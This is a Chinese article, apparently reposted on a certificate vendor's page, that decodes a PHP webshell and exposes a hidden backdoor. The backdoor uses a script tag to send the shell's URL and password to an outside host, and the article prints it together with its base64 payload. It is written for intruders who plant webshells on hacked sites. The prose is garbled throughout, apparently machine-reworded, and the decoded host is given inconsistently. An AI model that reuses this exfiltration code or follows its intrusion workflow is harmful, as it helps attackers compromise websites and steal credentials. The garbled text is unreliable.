|
|
|
联系客服020-83701501

解密php webshell后门

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
解密php 网站shell后门

仅将此文献给还在为他人的网站shell做出奉献的同学。

拿下一个网站后,理所虽然的传网站shll,提权。

然则一些人会在网站shell中拔出小小的一段代码,如许你艰辛拿下的网站shell的地址和暗码等等就会统统发送给在网站shell插后门的人。

这段代码小大由之,下面是我随便率性找的一个php网站shell,来解密一下此中的后门。

首先是用记事本打开这个网站shell,大概看到,这个shell的大全部代码凡是颠末进程base64编码的。运行时在解码运行,如许他人就不克不及直接看到明文的代码。

接下去即是解密的进程了,首先,我们将eval改成print_r

这里说一下,解密过来要先把PHP的环境搭建好。 而后生活糊口糊口生涯生涯运行。

运行后大概看到,基础的代码都直接透露表现了出来,如许就获取了这个网站shell中的大全部代码,然则图中还有一全部是base64编码的代码,不过只是一小段,所以我们大概本人写个小的php来透露表现出来

<?php
print_r(base64_decode(‘颠末进程base64编码的代码’));
?>

首先我找到的第一段编码是base64_decode(‘PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JT
cyJTc0Lz9jZXJ0PTEzJnU9′)

这段代码赋值给了$copyurl变量。

把这段编码放进下面的那一小段解密用的php内,而后运行。

大概看到,运行结果是空明的,然则检查源文件后大概看到那末一段script。此中http://前面的带百分号的大概去URL解码一下

这即是解码后的网址了。
<script src=’http://91ri.org/ cert/?cert=13&u=

先复制这段可疑的script,放文本内。

在过来那段base64编码的下面,我又缔造了被赋值给变量$copyurll的编码base64_decode(‘Jz48L3NjcmlwdD4=’)
将这段编码经由下面的方法解码后透露表现的结果是:’></script>

这段代码偏偏和下面解密的一段结分解为了残破的一段script

<script src=’http://8cce.com/cert/?cert=13&u=’></script>

以后我们大概看看这段可疑的代码是做什么用的,因为是分别赋值给了$copyurl和$copyurll,所以我们直接搜索这两个变量就好了

下列是搜索的结果

大概看到:echo “”.$copyurl.$serveru.”&p=”.$serverp.$copyurll.””;
这段代码里,$serveru和$serverp分别是网站shell地址和网站shell的暗码。

那echo残破的语句就成为了:echo <script src=’http://8cce.com/cert/?cert=13&u=网站shell地址&p=网站shell暗码’></script>

再结合这段echo前面的代码大概看出,在考据网站shell暗码切确后,再把暗码经由script提交到解密后的网址中。

经由以上解密,就大概看出这个网站shell是已经被人拔出了后门,虽然也有大要不止这一个后门。

所以以后大家在用网站shell首先要当心一下可否已经被人拔出了后门,否则你大要艰辛拿下的网站他人江中钓月的直接登岸你的网站shell就管教了这个网站。

本文来自网络作者匿名由网络平安攻防钻研室(www.91ri.org)消息平安小组收集,转载请阐明情由。

数安新闻+更多

证书相关+更多